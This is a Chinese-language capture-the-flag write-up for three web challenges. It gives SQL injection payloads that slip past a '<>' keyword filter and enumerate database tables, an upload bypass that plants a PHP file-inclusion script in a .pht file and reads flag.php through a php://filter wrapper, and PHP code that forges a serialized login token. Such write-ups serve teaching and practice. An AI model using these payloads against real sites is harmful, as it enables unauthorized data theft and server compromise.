百度CTF

1.sql

提示Flag 在数据库

  测试发现过滤  <>

所以: 

1.查字段

      or<>der  by 1

     or<>der   by 2

     or<>der   by 3

     or<>der   by 4

    4 错误    => 字段为 3

2.看回显

   un<>ion se<>lect 1,2,3

   回显为 2

3.查数据库名(select schema_name from information_schemata limit N,1)

  un<>ion se<>lect 1,(se<>lect schema_name from information_schema.schemata limit 0,1),3        => information_schema

 un<>ion se<>lect 1,(se<>lect schema_name from information_schema.schemata limit 1,1),3         =>sqli

4.查表名(select table_name from information_schema.tables where table_schema =database()  limit N,1)

  un<>ion se<>lect 1,(se<>lect table_name from information_schema.tables where table_schema ='sqli'  limit 0,1),3  =>  info

5.查字段名(select column_name from information_schema.columns where table_name =表名 limit N,1)

注:这information_schema.columns =>in<>formation_schema.columns

un<>ion se<>lect 1,(se<>lect column_name from in<>formation_schema.columns where table_name='info' limit 0,1),3  => id

un<>ion se<>lect 1,(se<>lect column_name from in<>formation_schema.columns where table_name='info' limit 1,1),3  =>title

un<>ion se<>lect 1,(se<>lect column_name from in<>formation_schema.columns where table_name='info' limit 2,1),3  =>flAg_T5ZNdrm

6.查数据(select 字段名 from 表名 limit N,1)

un<>ion se<>lect 1,(se<>lect flAg_T5ZNdrm from info limit 0,1),3

 2.Upload

     随便上传一张图片

    Content-Disposition: form-data; name="file"; filename="1.pht"

    <script language="PHP">require_once("$_GET[id]");</script>

    地址+/u/1.pht?id=php://filter/convert.base64-encode/resource=../flag.php 

   解密的 flag

3.login

    查看元素发现: <!--  test1 test1  -->

        登录进:member.php  =>(╯‵□′)╯︵┴─┴

         抓包分析:发现 =>  show:0

         于是 :

       

         写个php算出token

        <?php
         $arr = array('user'=>'ichunqiu');
         $taken = base64_encode(gzcompress(serialize($arr)));
        echo $taken;
        ?>